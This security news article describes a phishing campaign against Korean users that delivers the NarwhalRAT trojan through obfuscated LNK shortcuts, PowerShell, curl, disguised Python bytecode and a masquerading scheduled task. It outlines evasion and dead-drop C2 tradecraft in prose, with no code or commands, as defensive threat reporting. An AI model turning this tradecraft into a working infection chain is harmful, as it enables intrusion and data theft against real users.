A recent cyberattack has been identified targeting Korean users through a meticulously crafted infection chain. The attackers employ deceptive shortcut files, native Windows utilities, and a compiled Python payload to install a remote access trojan (RAT) known as NarwhalRAT on victims’ systems. This method is particularly notable for its ability to blend seamlessly with legitimate system activities, thereby evading detection.
The attack initiates with a spear-phishing email masquerading as an urgent security alert from the “Microsoft Account Team.” The email warns recipients of suspicious one-time password activities and prompts them to open an attached advisory document. However, the attachment is a ZIP archive containing a malicious LNK shortcut file, rather than a genuine document.
Upon execution of the LNK file, a multi-layered infection process begins. The shortcut utilizes command-line obfuscation techniques to reconstruct commands like “powershell” and “curl.exe” at runtime, effectively bypassing static detection mechanisms. This approach exemplifies the “Living-off-the-Land” strategy, where attackers exploit legitimate system tools for malicious purposes.
After deobfuscation, the LNK file launches PowerShell with execution policies bypassed and employs a copied version of curl.exe to download two files from a relay server. The first is a decoy HWP document, which is opened to divert the victim’s attention, while the second is a batch script named KHjWFcuS.bat that executes the next stage of the installation process in a concealed window.
The batch script proceeds to download the official Python embedded package, renaming Pythonw.exe to usersscreen.exe to suppress any console window from appearing. The final payload, config.cat, is disguised with a .cat extension to resemble a Windows security catalog file. In reality, it is compiled Python bytecode functioning as a backdoor loader.
To maintain persistence on the infected system, the malware registers a scheduled task named “MicrosoftUserInterfacePicturesUpdateTackMachine,” set to run at one-minute intervals. This task name closely mimics legitimate Microsoft tasks, making it challenging for system administrators to identify during routine inspections.
Analysts at Genians Security Center have observed that this threat shares significant similarities with a Python-based backdoor campaign documented in May 2026. The malware has been dubbed NarwhalRAT, derived from the string “naverwhale” found within its code, likely an attempt to impersonate Naver Whale, a popular browser in South Korea.
NarwhalRAT exhibits behaviors that indicate a primary focus on Korean users. It utilizes “naverwhale” as its working directory name and assigns Hidden and System attributes to the created folder to remain inconspicuous. Additionally, it specifically handles KakaoTalk-related window identifiers during data collection, further suggesting its targeting of Korean users.
The attackers have implemented a dual command-and-control (C2) structure, employing a Korean relay server alongside the pCloud API as a Dead-drop Resolver. This setup allows the attackers to modify the actual C2 address without altering the malware itself and helps the malicious traffic blend with normal web activity, complicating detection efforts.
This campaign underscores the evolving sophistication of cyber threats, particularly those targeting specific regional user bases. The use of legitimate tools and services in the attack chain highlights the necessity for organizations to adopt comprehensive security measures that go beyond traditional signature-based detection methods. Enhanced user education on recognizing phishing attempts and the implementation of behavioral analysis tools are crucial steps in mitigating such advanced threats.
